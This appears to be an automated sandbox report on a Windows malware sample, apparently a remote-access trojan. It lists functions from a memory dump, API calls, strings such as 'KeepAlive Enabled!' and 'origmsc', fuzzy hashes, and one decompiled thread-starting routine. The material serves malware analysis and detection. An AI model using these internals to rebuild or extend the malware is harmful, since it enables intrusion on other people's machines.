                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@V?$basic_string@$D@2@@0@$??1?$basic_string@Hstd@@$??0?$basic_string@??4?$basic_string@??8std@@??9std@@D@1@@D@2@@0@0@V01@V01@@V10@V10@@
                                        • String ID: [End of clipboard text]$[Following text has been copied to clipboard:]
                                        • API String ID: 1191203583-3441917614
                                        • Opcode ID: 33ee1aab2d947228c589f5a2726d23556808232515a381d0ba99c9c06a6ea012
                                        • Instruction ID: f0c7cb0c0afa7c9892d6ee07c4285c518a0e55952a049bef315af4c10592b83c
                                        • Opcode Fuzzy Hash: 33ee1aab2d947228c589f5a2726d23556808232515a381d0ba99c9c06a6ea012
                                        • Instruction Fuzzy Hash: F511BC71A00209A7CB04E7A5ED49EEF77BCDB95755B10403BF402B3191DB7889898769
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 37%
                                        			E00402580(void* __ecx, intOrPtr _a4, intOrPtr _a8, char _a11) {
                                        				struct _SYSTEMTIME _v20;
                                        				char _v36;
                                        				void* _v52;
                                        				char* _t25;
                                        				char* _t26;
                                        				intOrPtr _t35;
                                        				void* _t37;
                                        
                                        				_t37 = __ecx;
                                        				if( *((intOrPtr*)(__ecx + 0x38)) != 0) {
                                        					__eflags = 0;
                                        					return 0;
                                        				}
                                        				_t35 = _a4;
                                        				if(_a8 != 0) {
                                        					__eflags =  *0x41bcac; // 0x0
                                        					if(__eflags != 0) {
                                        						GetLocalTime( &_v20);
                                        						_t25 =  &_a11;
                                        						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [INFO] ", _t25, "KeepAlive Enabled! Timeout: %i seconds\n", _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff, _v20.wMilliseconds & 0x0000ffff, _t35);
                                        						_t26 =  &_v36;
                                        						L00414170();
                                        						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t26, _t25);
                                        						printf(_t26);
                                        						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                        					}
                                        				} else {
                                        					 *((char*)(__ecx + 0x44)) = 1;
                                        				}
                                        				 *((char*)(_t37 + 0x38)) = 1;
                                        				 *((intOrPtr*)(_t37 + 0x3c)) = _t35;
                                        				CreateThread(0, 0, E004027A2, _t37, 0, 0);
                                        				return 1;
                                        			}
                                        0x00402588
                                        0x0040258f
                                        0x0040262f
                                        0x00000000
                                        0x0040262f
                                        0x00402599
                                        0x0040259c
                                        0x004025a4
                                        0x004025aa
                                        0x004025b0
                                        0x004025ce
                                        0x004025dc
                                        0x004025e3
                                        0x004025e7
                                        0x004025f1
                                        0x004025f8
                                        0x00402604
                                        0x0040260d
                                        0x0040260d
                                        0x0040259e
                                        0x0040259e
                                        0x0040259e
                                        0x0040261d
                                        0x00402621
                                        0x00402624
                                        0x00000000

                                        APIs
                                        • GetLocalTime.KERNEL32(?,00000001,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,0040CAF3,0000000A,00000000), ref: 004025B0
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [INFO] ,?,KeepAlive Enabled! Timeout: %i seconds,0000000A,?,00000000,?,0000000A), ref: 004025DC
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,0040CAF3,0000000A,00000000), ref: 004025E7
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,0040CAF3,0000000A,00000000), ref: 004025F1
                                        • printf.MSVCRT ref: 004025F8
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402604
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040260D
                                        • CreateThread.KERNEL32(00000000,00000000,004027A2,0041BE70,00000000,00000000), ref: 00402624
                                        Strings
                                        • %02i:%02i:%02i:%03i [INFO] , xrefs: 004025D7
                                        • KeepAlive Enabled! Timeout: %i seconds, xrefs: 004025D1
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@CreateD@1@@D@2@@0@Hstd@@LocalThreadTimeV10@V?$basic_string@printf
                                        • String ID: %02i:%02i:%02i:%03i [INFO] $KeepAlive Enabled! Timeout: %i seconds
                                        • API String ID: 3715082883-586133315
                                        • Opcode ID: 51604d627dacd7a8ae8a3435ef703a50610ed316e6cde58bd2f1e49f68c81dc1
                                        • Instruction ID: a312a60622e34753c5bc094497f25c33392341c8bb354fb046c7070d615c6ac2
                                        • Opcode Fuzzy Hash: 51604d627dacd7a8ae8a3435ef703a50610ed316e6cde58bd2f1e49f68c81dc1
                                        • Instruction Fuzzy Hash: A611EB71800258FFCB119BE1DC48DFFBBBCAB95705B004426F842A3190D6B99944CB68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                          • Part of subcall function 0041358B: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040969A,?,?), ref: 0041359B
                                          • Part of subcall function 0041358B: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,0040969A,?,?), ref: 004135B2
                                          • Part of subcall function 0041358B: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135CA
                                          • Part of subcall function 0041358B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135D3
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00411A41
                                        • PathFileExistsW.SHLWAPI(00000000), ref: 00411A48
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041C1C0,00415664), ref: 00411A61
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00416B00,?), ref: 00411A84
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00416B00,?), ref: 00411AA9
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00411ABE
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041C1C0), ref: 00411ACB
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00411ADC
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00411AEC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@G@2@@std@@G@std@@$D@2@@std@@$??0?$basic_string@?c_str@?$basic_string@$??1?$basic_string@D@1@@$??8std@@D@2@@0@ExistsFilePathV01@@V?$basic_string@
                                        • String ID: alarm.wav
                                        • API String ID: 3304909635-4094641389
                                        • Opcode ID: bebabaa453ebb8ad60829e5f1d269cc78c12b9cc97e436605a7a08e32ec2c8ef
                                        • Instruction ID: 963edfdf3fd52f0052b6b10baeb02962c7ef6d970aeca7efa99f7092008c0f7b
                                        • Opcode Fuzzy Hash: bebabaa453ebb8ad60829e5f1d269cc78c12b9cc97e436605a7a08e32ec2c8ef
                                        • Instruction Fuzzy Hash: 4E11E931A41608E7CB04F7F5DD4AAEE3B38DF44342F504066F912930E1DBA85A84C6AE
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AD79
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6F5E5DF0), ref: 0040AD91
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(Function_0001B310), ref: 0040ADA1
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040ADB0
                                          • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                          • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                          • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                          • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040ADDB
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040ADF1
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040AE07
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040AE1D
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040AE33
                                          • Part of subcall function 0040AE6A: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040AE88
                                          • Part of subcall function 0040AE6A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEA4
                                          • Part of subcall function 0040AE6A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEB4
                                          • Part of subcall function 0040AE6A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040AEC1
                                          • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AED3
                                          • Part of subcall function 0040AE6A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AEEB
                                          • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AEFD
                                          • Part of subcall function 0040AE6A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF18
                                          • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF2A
                                          • Part of subcall function 0040AE6A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AF42
                                          • Part of subcall function 0040AE6A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040AF4B
                                          • Part of subcall function 0040AE6A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60( /stext ",?,?,00415628,00000000), ref: 0040AF69
                                          • Part of subcall function 0040AE6A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040AF7B
                                          • Part of subcall function 0040AE6A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040AF88
                                          • Part of subcall function 0040AE6A: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040AF95
                                          • Part of subcall function 004020F4: closesocket.WS2_32(0041BE70), ref: 004020F9
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AE56
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040AE5F
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@$V01@@$?c_str@?$basic_string@$D@1@@G@std@@$?length@?$basic_string@G@2@@0@Hstd@@V12@V?$basic_string@$?substr@?$basic_string@$??4?$basic_string@?find@?$basic_string@FileG@1@@G@2@@std@@ModuleNameV01@V10@V10@0@V10@@closesocket
                                        • String ID:
                                        • API String ID: 1795822965-0
                                        • Opcode ID: 577d363030fa7591e52d31dd8c7d90d933b05a2efaa5bb55a7e707ed632d8bb6
                                        • Instruction ID: 48313c0a065dcb0dcea7f82e9129112a0e8bb123b90d7e9a0fd4ac289fd1d0c5
                                        • Opcode Fuzzy Hash: 577d363030fa7591e52d31dd8c7d90d933b05a2efaa5bb55a7e707ed632d8bb6
                                        • Instruction Fuzzy Hash: D3216271A0010DABCB04BBB5DD5A9EE3778EF44341F408569E922A71E1EF745604CB9A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 0040215B
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 00402168
                                        • malloc.MSVCRT ref: 00402175
                                        • recv.WS2_32(0041BE70,00000000,000003E8,00000000), ref: 00402186
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8), ref: 0040219A
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021A4
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021AD
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021BA
                                          • Part of subcall function 0040221E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,0041BE70,00000000), ref: 00402230
                                          • Part of subcall function 0040221E: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 00402248
                                          • Part of subcall function 0040221E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402257
                                          • Part of subcall function 0040221E: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402261
                                          • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040227A
                                          • Part of subcall function 0040221E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402283
                                          • Part of subcall function 0040221E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0040D2A6,0041BEA4), ref: 004022A2
                                          • Part of subcall function 0040221E: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004022C2
                                          • Part of subcall function 0040221E: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 004022DA
                                          • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(0040D2A6), ref: 004022EC
                                          • Part of subcall function 0040221E: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0000000F,6F5E5DF0), ref: 00402302
                                          • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040230C
                                          • Part of subcall function 0040221E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402315
                                          • Part of subcall function 0040221E: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,0040D2A6), ref: 00402326
                                          • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00402330
                                          • Part of subcall function 0040221E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402339
                                          • Part of subcall function 0040221E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040234D
                                        • free.MSVCRT(00000000,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021DB
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 00402204
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 0040220D
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$V01@@$??1?$basic_string@V01@$??0?$basic_string@??4?$basic_string@$D@1@@$??9std@@?substr@?$basic_string@D@2@@0@V12@V?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@?length@?$basic_string@?size@?$basic_string@Y?$basic_string@freemallocrecv
                                        • String ID:
                                        • API String ID: 2200674315-0
                                        • Opcode ID: 533559aab0e3dcf38d7224a0014533e596ea9eed5f72da431cbdb498b9f83fa6
                                        • Instruction ID: 77ffb52b31aa9a22c106954051cf48487ac881783d2d7cd2d5b7dec6e0024f6e
                                        • Opcode Fuzzy Hash: 533559aab0e3dcf38d7224a0014533e596ea9eed5f72da431cbdb498b9f83fa6
                                        • Instruction Fuzzy Hash: 0221443250050DEBCB15EBA0DE49EDEB7B9FF94745B104029E902B21D1DBB56A05CB14
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 004124CD
                                        • time.MSVCRT ref: 004124E5
                                        • srand.MSVCRT ref: 004124F2
                                        • rand.MSVCRT ref: 00412506
                                        • rand.MSVCRT ref: 0041251A
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@D@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041252D
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 0041253D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00401B5A,?), ref: 00412546
                                        Strings
                                        • abcdefghijklmnopqrstuvwxyz, xrefs: 004124D5
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@rand$??1?$basic_string@D@1@@V01@V01@@Y?$basic_string@srandtime
                                        • String ID: abcdefghijklmnopqrstuvwxyz
                                        • API String ID: 3357298394-1277644989
                                        • Opcode ID: 15b0aad6ad470baee71e932c84e056877b09aa3be15cdb2110e7ae94f5adee03
                                        • Instruction ID: 712daf16f8b1022a6d974ed1f73c2a3049aadf137e9a4f533f5eb28a92ccc556
                                        • Opcode Fuzzy Hash: 15b0aad6ad470baee71e932c84e056877b09aa3be15cdb2110e7ae94f5adee03
                                        • Instruction Fuzzy Hash: F211A57754021DEBCB04EBA1ED49AEE7BB9EB80361F104026FD01E71D0DA759945CB68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,origmsc), ref: 0040B96C
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004032A4,?), ref: 0040B97C
                                          • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                          • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                          • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                          • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                          • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                          • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                          • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4,80000001), ref: 0040B993
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004032A4), ref: 0040B9AB
                                          • Part of subcall function 0040B9E8: RegOpenKeyExW.ADVAPI32(80000001,0040B9BA,00000000,00000002,0040B9BA,?,0040B9BA,80000001,00000000), ref: 0040B9F9
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9C2
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9CB
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9D4
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040B9DD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$D@2@@std@@D@std@@$??1?$basic_string@$??0?$basic_string@$?begin@?$basic_string@?c_str@?$basic_string@D@1@@$?end@?$basic_string@?length@?$basic_string@G@1@@OpenV01@@
                                        • String ID: origmsc
                                        • API String ID: 643209241-68016026
                                        • Opcode ID: 494479129972e0f7fefba417d02f2ddae7ca3d57713fac6220985ed7839bb053
                                        • Instruction ID: bc2c983ee8b044bee8b0063c187639ee25001bfa26dad0cec207db0dad549837
                                        • Opcode Fuzzy Hash: 494479129972e0f7fefba417d02f2ddae7ca3d57713fac6220985ed7839bb053
                                        • Instruction Fuzzy Hash: 9111B17280050DEFCF04EFE0ED598DE77B9EA482557104025F912D31A0EB71AA59CB58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

